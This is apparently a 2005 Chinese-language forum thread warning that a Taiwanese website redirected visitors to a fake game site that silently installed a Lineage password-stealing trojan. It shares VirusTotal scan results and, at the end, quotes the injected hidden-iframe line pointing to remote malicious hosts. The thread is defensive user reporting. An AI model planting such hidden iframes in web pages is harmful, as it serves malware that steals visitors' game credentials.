hxxt://www.map.com.tw
不知道從哪連到大陸假的gamebase.org.cn
然後利用漏洞下載安裝不明程式
而且沒一家掃的出來
已經回報給kav看看了
有去過的小心了
hxxt://www.map.com.tw
不知道從哪連到大陸假的gamebase.org.cn
然後利用漏洞下載安裝不明程式
而且沒一家掃的出來
已經回報給kav看看了
有去過的小心了
通常這類的入侵..都是在種"天堂"的木馬..
剛剛看了一下..卡巴斯基已經可以掃出來了
Trojan-PSW.Win32.Lineage.cb
果然...還是「天堂」木馬....
看樣子大陸仔的駭客靠這個測了不少錢 = =
下面是我把他那個有問題的.chm檔傳去 virustotal 掃的結果...
Antivirus Version Update Result
AntiVir 6.30.0.7 04.01.2005 no virus found
AVG 718 04.01.2005 no virus found
BitDefender 7.0 04.02.2005 no virus found
ClamAV devel-20050307 04.02.2005 no virus found
DrWeb 4.32b 04.02.2005 no virus found
eTrust-Iris 7.1.194.0 04.02.2005 no virus found
eTrust-Vet 11.7.0.0 04.01.2005 no virus found
Fortinet 2.51 04.02.2005 no virus found
F-Prot 3.16a 03.31.2005 no virus found
Ikarus 2.32 04.01.2005 no virus found
Kaspersky 4.0.2.24 04.02.2005 Trojan-PSW.Win32.Lineage.cb
McAfee 4460 04.01.2005 no virus found
NOD32v2 1.1044 04.02.2005 no virus found
Norman 5.70.10 03.31.2005 no virus found
Panda 8.02.00 04.02.2005 no virus found
Sybari 7.5.1314 04.02.2005 no virus found
Symantec 8.0 04.02.2005 no virus found
-------------------------------------------------------------------------
www.virustotal.com :: @ Hispasec Sistemas 2004 :: e-mail [email protected]
我把防毒關掉去試試看
發現電腦可疑檔案KAV掃不到
我想應該是病毒
或許可能認錯...
我後來在進去遇到的是trojanlineage.cb作者:kaspersky
但是我第一次進去後 發現temporary資料夾多出icyfox.exe
似乎檔名跟以前lineage的病毒檔名差不多
而且程序中馬上多出不明程序inertinfo
lineage.cb傳到 VirusTotal也沒幾家可以掃到
這次如果是新變種的話...可能更少可以察覺到了...
我覺的是木馬機會蠻大的...也可能是我太過緊張了
依照您這樣的敘述 應該是木馬沒有錯
只是先和您確認 您現在放上來的這個檔案 是不是就是您第一次傳給 virustotal 以及 kav 的同一個檔案 ?
嗯嗯 沒錯作者:kaspersky
傳給KAV的裡面其中一個檔案我沒放上來..因為應該是正常的系統檔案
壓縮檔一直掃不到病毒但是看原始檔應該是這行有問題,Mcafee可以抓到..
<iframe width=0 height=0 src="http://www.xx158.com/tian/icyfox.htm"><iframe src="http://hc898.xm18.china-host.net/2005/" width="0" height="0"></iframe>
書籤